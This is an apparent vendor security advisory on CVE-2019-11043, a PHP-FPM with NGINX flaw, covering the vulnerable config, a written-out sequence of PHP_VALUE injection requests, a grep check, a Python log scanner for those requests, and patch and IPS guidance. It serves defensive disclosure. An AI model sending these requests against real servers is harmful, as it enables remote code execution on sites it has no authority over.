PHP-FPM Vulnerability leads to Remote code execution

PHP-FPM (PHP Fast Process Manager) is a FastCGI handler for PHP scripts and applications, especially useful for busier sites. It’s commonly paired with web servers to serve applications which require a PHP framework, such as web forums or login gateways, while the web server returns HTML, JavaScript, and other non-PHP content.

FastCGI is a way to have CGI scripts execute time-consuming code (like opening a database) only once, rather than every time the script is loaded. It mainly helps to reduce the overhead related to interfacing between web server and CGI programs, allowing a server to handle more web page requests per unit of time.

Vulnerability | CVE-2019-11043
This vulnerability can be triggered only with the NGINX configuration shown below, and only when NGINX is paired with PHP-FPM. It allows the FPM module to write past allocated buffers into the space reserved for FCGI protocol data, which opens the possibility of remote code execution.

    location ~ [^/]\.php(/|$) {
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO $fastcgi_path_info;
        fastcgi_pass php:9000;
        …

The regexp in the `fastcgi_split_path_info` directive can be broken with a newline character (`%0a` in URL-encoded form). The broken regexp leaves PATH_INFO empty. When php-fpm handles an empty PATH_INFO, a logic flaw allows attackers to create fake PHP_VALUE variables. Using this technique, attackers can chain carefully chosen config values to achieve remote code execution.

Exploit:

The attacker’s requests look like the following:

GET /index.php/PHP_VALUE%0Asession.auto_sart=0;;;;
GET /index.php/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;;
GET /index.php/PHP_VALUE%0Ainclude_path=/tmp;;;;;;
GET /index.php/PHP_VALUE%0Aauto_prepend_file=a;;;;
GET /index.php/PHP_VALUE%0Alog_errors=1;;;;;;;;;;;
GET /index.php/PHP_VALUE%0Aerror_reporting=2;;;;;;
GET /index.php/PHP_VALUE%0Aerror_log=/tmp/a;;;;;;;
GET /index.php/PHP_VALUE%0Aextension_dir=%22%3C%3F
GET /index.php/PHP_VALUE%0Aextension=%22$_GET%5Ba%

Fix:

Admins are advised to check whether their servers are vulnerable by executing a simple bash command:
    egrep -Rin --color 'fastcgi_split_path' /etc/nginx/
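The config check above only finds the vulnerable directive; the following added Python example (not part of the original advisory) complements it from the log side. It models the `fastcgi_split_path_info` regex to show why a decoded `%0a` leaves PATH_INFO empty, and scans constructed NGINX access-log lines for requests of the shape listed in the Exploit section. The assumption that a failed regex match yields an empty `$fastcgi_path_info` follows the advisory's own description.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Regex taken from the vulnerable fastcgi_split_path_info directive quoted above.
SPLIT_PATH_INFO = re.compile(r"^(.+?\.php)(/.*)$")
# Matches the request line inside a combined-format NGINX access-log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[0-9.]+"')


def split_path_info(decoded_path: str) -> tuple[str, str]:
    """Model fastcgi_split_path_info on an already URL-decoded path.

    Returns (script_name, path_info). As in PCRE, '.' does not match a newline
    and '$' anchors only at the end, so a decoded %0a inside the path makes the
    regex fail. Assumption (as the advisory describes): a failed match leaves
    $fastcgi_path_info, and therefore PATH_INFO, empty.
    """
    m = SPLIT_PATH_INFO.match(decoded_path)
    if m is None:
        return decoded_path, ""
    return m.group(1), m.group(2)


def is_suspicious_uri(raw_uri: str) -> bool:
    """Flag a URI that carries a newline into the PATH_INFO of a .php script,
    the precondition for the PHP_VALUE injection described above."""
    path = unquote(raw_uri.split("?", 1)[0])
    _script, path_info = split_path_info(path)
    return ".php/" in path and "\n" in path and path_info == ""


def scan_access_log(lines) -> list[str]:
    """Return the URIs of log entries matching the CVE-2019-11043 request shape."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and is_suspicious_uri(m.group("uri")):
            hits.append(m.group("uri"))
    return hits


# Constructed sample access-log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Oct/2019:10:00:01 +0000] "GET /index.php/user/42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [22/Oct/2019:10:00:02 +0000] "GET /index.php/PHP_VALUE%0Ahtml_errors=0;;;;;;;;;; HTTP/1.1" 200 612 "-" "curl/7.64.0"',
    '10.0.0.9 - - [22/Oct/2019:10:00:03 +0000] "GET /index.php/PHP_VALUE%0Ainclude_path=/tmp;;;;;; HTTP/1.1" 200 612 "-" "curl/7.64.0"',
    '10.0.0.7 - - [22/Oct/2019:10:00:04 +0000] "GET /static/app.js?v=3 HTTP/1.1" 200 9112 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for uri in scan_access_log(SAMPLE_LOG):
        print("suspicious:", uri)
```

Run it against a real access log by reading the file into `scan_access_log`; the heuristic is intentionally narrow (newline inside a `.php/` PATH_INFO), so it complements rather than replaces the IPS signature below.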

It is recommended to upgrade to the patched release (or later) of your PHP version.

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

    IPS 14523: PHP-FPM NGINX Remote Code Execution

SonicWall WAF has been designed to provide protection against this exploit by default.
